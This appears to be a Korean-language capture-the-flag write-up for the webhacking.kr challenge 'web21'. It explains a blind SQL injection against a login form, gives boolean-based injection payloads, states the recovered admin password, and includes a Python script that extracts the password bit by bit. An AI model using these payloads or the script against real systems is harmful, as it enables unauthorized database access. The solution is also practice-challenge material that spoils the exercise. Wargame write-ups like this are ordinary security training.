Webhacking.kr - web21

web21

blind sql injection 문제
근데 예상하기로는 비밀번호를 맞춰야 되는 문제같음.

코드가 이렇게 되어있는 것 같음.
입력한 id 값이 테이블에 존재하면 그 id의 pw를 가져온 뒤 입력한 값과 비교해서 같으면 login되는 것 같음.
select pw from table where id=''

if pw != $_GET['pw'] -> wrong password

Solution

필터링 : union select

id=' or 1 %23&pw=1 -> wrong password
id=' or 0 %23&pw=1 -> login fail

이 차이점을 이용해서 if문을 통해 뽑아올 것임.

id=' or id='admin' and if(ascii(substr(pw,1,1))>48,1,0)%23&pw=1 -> wrong password
id=' or id='admin' and if(ascii(substr(pw,1,1))<48,1,0)%23&pw=1 -> login fail

우선 id='admin'의 pw 길이는 26
결과는 pw : there_is_no_rest_for_the_white_angel
따라서 id=admin, pw=there_is_no_rest_for_the_white_angel 입력해주면 성공.

import requests

url='https://webhacking.kr/challenge/bonus-1/'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'} 

bit_len=''
bit_val=''
pw=''

for i in range(1,37) :
    payload={'id':"' or id='admin' and if(length(bin(ascii(substr(pw,"+str(i)+",1))))=7,1,0)#", 'pw':'1'}
    res=requests.get(url, headers=headers, cookies=cookies, params=payload)
    if 'wrong password</b>' in res.text :
        bit_len=7
    else :
        bit_len=6
   
    for j in range(1,bit_len+1):
        payload={'id':"' or id='admin' and if(substr(bin(ascii(substr(pw,"+str(i)+",1))),"+str(j)+",1)=0,1,0)#", 'pw':'1'}
        res=requests.get(url, headers=headers, cookies=cookies, params=payload)
        if 'wrong password</b>' in res.text :
            bit_val+='0'
        else :
            bit_val+='1'
          
    pw+=chr(int(bit_val,2))
    bit_val=''
    print('pw :',pw)